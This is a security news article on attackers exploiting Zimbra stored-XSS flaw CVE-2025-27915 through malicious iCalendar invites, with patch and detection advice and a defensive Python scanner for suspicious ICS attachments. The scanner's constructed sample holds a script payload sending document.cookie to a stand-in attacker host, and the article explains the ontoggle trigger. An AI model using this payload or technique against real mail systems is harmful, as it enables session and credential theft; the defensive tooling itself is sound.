Hackers exploited a vulnerability in Zimbra via iCalendar files

06.10.2025 2 minutes Author: Newsman

Earlier this year, attackers exploited a then-unpatched (zero-day) vulnerability in Zimbra Collaboration Suite, CVE-2025-27915, by sending malicious iCalendar (.ICS) files. The flaw let them inject JavaScript into the victim's webmail session and steal data from users' emails, contacts, and shared folders.

StrikeReady researchers discovered the attack while monitoring unusually large iCalendar files (over 10 KB) that contained JavaScript code. CVE-2025-27915 is a stored cross-site scripting (XSS) flaw in the Classic Web Client of ZCS versions 9.0, 10.0, and 10.1: HTML embedded in an ICS file is not sanitized sufficiently, so a calendar entry can carry an event handler (such as ontoggle on a <details> tag) that fires when the user views the email, and the attacker's script then runs with the full privileges of the logged-in user's session.

After discovering the attack, the researchers traced the activity back to early January 2025, before Zimbra had released a patch. The attackers posed as the Libyan Navy Protocol Directorate, sending fake meeting invitations with malicious ICS attachments. The Base64-encoded JavaScript payload stole credentials, emails, and contacts and sent them to a ProtonMail address controlled by the attackers. The script could also inject a hidden password field to capture credentials, track user activity, forcibly log out users who had been inactive, and create mail filter rules that redirected incoming messages to the attackers.

Zimbra fixed the vulnerability on January 27, 2025, in ZCS 9.0.0 Patch 44, 10.0.13, and 10.1.5. At the time, however, the company gave no indication that the flaw was being exploited in the wild. StrikeReady suggests the operation may have been carried out by a sophisticated group similar to UNC1151, which has previously been linked to the Belarusian government.

Affected organizations, including the Brazilian military, were advised to:

  • audit existing mail filter rules for forwarding or redirection they did not create,

  • update Zimbra to the latest patched version,

  • monitor network activity, and flag Base64-encoded ICS attachments, particularly large ones containing script.
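The detection heuristic StrikeReady used (large ICS attachments carrying JavaScript) and the recommendation to flag Base64-encoded ICS files can be turned into a simple mail scanner. The following script is an added example written for this page; it is not StrikeReady's tooling or Zimbra's code. It builds a constructed sample .eml with one benign invite and one oversized, Base64-encoded invite that hides a script tag across an RFC 5545 line fold, then reports each ICS attachment. The size threshold comes from the article; the JavaScript indicator patterns, sample addresses and file names are assumptions chosen for illustration.

```python
import email
import re
from email import policy
from email.message import EmailMessage

# Threshold from the article: StrikeReady keyed on ICS files over 10 KB.
SIZE_THRESHOLD = 10 * 1024

# Indicator patterns are our own assumption of what "contains JavaScript"
# looks like inside an HTML-bearing ICS body (X-ALT-DESC, DESCRIPTION, ...).
# The generic on*= pattern also covers ontoggle, which the CVE description
# names as the trigger inside a <details> tag.
JS_PATTERNS = [
    re.compile(rb"<script\b", re.I),
    re.compile(rb"\bon[a-z]+\s*=", re.I),
    re.compile(rb"javascript:", re.I),
    re.compile(rb"\beval\s*\(", re.I),
]


def unfold_ics(data: bytes) -> bytes:
    # RFC 5545 folds long lines as CRLF followed by a space or tab, so a naive
    # substring match would miss "<scr" + CRLF + " ipt>". Unfold first.
    return re.sub(rb"\r?\n[ \t]", b"", data)


def is_ics(part) -> bool:
    # Match on declared type or on file extension; attackers may use either.
    fname = (part.get_filename() or "").lower()
    return part.get_content_type() == "text/calendar" or fname.endswith(".ics")


def scan_eml(raw: bytes) -> list:
    """Return one finding dict per ICS attachment in a raw RFC 822 message."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.is_multipart() or not is_ics(part):
            continue
        cte = str(part.get("Content-Transfer-Encoding") or "").lower()
        body = part.get_payload(decode=True) or b""   # decodes base64/QP for us
        hits = [p.pattern.decode() for p in JS_PATTERNS if p.search(unfold_ics(body))]
        large = len(body) > SIZE_THRESHOLD
        findings.append({
            "filename": part.get_filename() or "(unnamed)",
            "base64": cte == "base64",
            "size": len(body),
            "large": large,
            "js_indicators": hits,
            # Flag on script content, or on the coarse "big + base64" heuristic.
            "suspicious": bool(hits) or (cte == "base64" and large),
        })
    return findings


def build_sample_eml() -> bytes:
    """Constructed sample message (hypothetical addresses and file names)."""
    msg = EmailMessage()
    msg["From"] = "protocol@example.invalid"
    msg["To"] = "officer@example.invalid"
    msg["Subject"] = "Meeting invitation (constructed sample)"
    msg.set_content("Please see the attached invitation.")

    benign = (b"BEGIN:VCALENDAR\r\nVERSION:2.0\r\nBEGIN:VEVENT\r\n"
              b"SUMMARY:Lunch\r\nEND:VEVENT\r\nEND:VCALENDAR\r\n")
    msg.add_attachment(benign, maintype="text", subtype="calendar",
                       filename="lunch.ics", cte="7bit")

    # Script tag split across a line fold, plus padding to exceed 10 KB.
    script = (b'<scr\r\n ipt>fetch("https://attacker.invalid/?c="'
              b'+document.cookie)</script>')
    malicious = (b"BEGIN:VCALENDAR\r\nVERSION:2.0\r\nBEGIN:VEVENT\r\n"
                 b"SUMMARY:Protocol meeting\r\n"
                 b"X-ALT-DESC;FMTTYPE=text/html:<html><body>" + script +
                 b"</body></html>\r\nDESCRIPTION:" + b"A" * 11000 +
                 b"\r\nEND:VEVENT\r\nEND:VCALENDAR\r\n")
    msg.add_attachment(malicious, maintype="text", subtype="calendar",
                       filename="invite.ics")   # bytes default to base64
    return msg.as_bytes()


if __name__ == "__main__":
    for f in scan_eml(build_sample_eml()):
        flag = "SUSPICIOUS" if f["suspicious"] else "ok"
        print(f"{f['filename']}: {f['size']} bytes, base64={f['base64']}, "
              f"indicators={f['js_indicators']} -> {flag}")
```

In production the scanner would be fed from a mail gateway or journal mailbox rather than a constructed message; the unfolding step matters because a payload that is split across folded ICS lines passes a plain grep for `<script`.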

This incident once again confirms that even everyday office files, such as calendar invitations, can become a channel for intrusion. It is important to apply patches promptly and to inspect the attachments that arrive in corporate email.

Hackers exploited a vulnerability in Zimbra Collaboration Suite (CVE-2025-27915) through iCalendar (.ICS) files to execute JavaScript and steal user data. StrikeReady reported attacks on military targets, and Zimbra released an update that fixes the vulnerability. The incident underlines the importance of timely patch management and of email monitoring that can detect suspicious ICS files.
